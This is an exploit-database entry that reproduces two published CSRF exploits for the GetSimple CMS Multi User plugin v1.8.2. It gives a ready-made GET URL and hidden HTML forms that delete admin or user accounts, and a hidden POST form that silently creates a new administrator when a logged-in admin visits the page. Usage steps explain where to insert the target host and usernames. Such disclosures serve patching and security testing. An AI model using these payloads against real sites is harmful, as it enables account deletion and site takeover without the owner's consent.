Exploit for GetSimple CMS Multi User 1.8.2 Cross Site Request Forgery

Name: Exploit for GetSimple CMS Multi User 1.8.2 Cross Site Request Forgery
Rating: 5 (143 reviews)
2020-08-13 | CVSS -0.1
## https://sploitus.com/exploit?id=PACKETSTORM:158863
# Exploit Title: GetSimple CMS Plugin Multi User v1.8.2 - Cross-Site Request Forgery (Delete Admin/User)  
# Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec)  
# Date: August 12, 2020  
# Vendor Homepage: http://get-simple.info/extend/plugin/multi-user/133/  
# Software Link: http://get-simple.info/extend/export/960/133/multi-user.zip  
# Version: 1.8.2  
# Tested On: Windows 10 Pro + XAMPP  
# CWE-352: Cross-Site Request Forgery (CSRF)  
# Vulnerability Description:  
# Cross-Site Request Forgery (CSRF) vulnerability in Multi User v1.8.2 plugin for GetSimple CMS allows remote attackers to delete admin/user users via authenticated admin visiting a third-party site or clicking a URL.  
  
## Usage:   
+ Change <IP||DOMAIN> to target IP address or domain name  
+ Change <ADMIN/USER_NAME> to target username to delete  
  
  
## CSRF GET URL Method  
<IP||DOMAIN>/admin/load.php?id=user-managment&deletefile=<ADMIN/USER_NAME>  
  
## CSRF POST Form Method  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="http://<IP||DOMAIN>/admin/load.php">  
<input type="hidden" name="id" value="user-managment" />  
<input type="hidden" name="deletefile" value="<ADMIN/USER_NAME>" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
  
  
  
# Exploit Title: GetSimple CMS Plugin Multi User v1.8.2 - Cross-Site Request Forgery (Add Admin)  
# Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec)  
# Date: August 12, 2020  
# Vendor Homepage: http://get-simple.info/extend/plugin/multi-user/133/  
# Software Link: http://get-simple.info/extend/export/960/133/multi-user.zip  
# Version: 1.8.2  
# Tested On: Windows 10 Pro + XAMPP  
# CWE-352: Cross-Site Request Forgery (CSRF)  
# Vulnerability Description:  
# Cross-Site Request Forgery (CSRF) vulnerability in Multi User v1.8.2 plugin for GetSimple CMS allows remote attackers to add an Admin user via authenticated admin visiting a third-party site.  
  
## Usage:   
+ Change <IP||DOMAIN> to target IP address or domain name  
+ Change <ADMIN> to target username  
+ Change <PASSWORD> to target password  
  
## CSRF POST Form Method  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="http://<IP||DOMAIN>/admin/load.php?id=user-managment" method="POST">  
<input type="hidden" name="usernamec" value="<ADMIN>" />  
<input type="hidden" name="useremail" value="ADMIN@DOMAIN.LOCAL" />  
<input type="hidden" name="ntimezone" value="" />  
<input type="hidden" name="userlng" value="en_US" />  
<input type="hidden" name="userpassword" value="<PASSWORD>" />  
<input type="hidden" name="usereditor" value="1" />  
<input type="hidden" name="Landing" value="" />  
<input type="hidden" name="add-user" value="Add New User" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>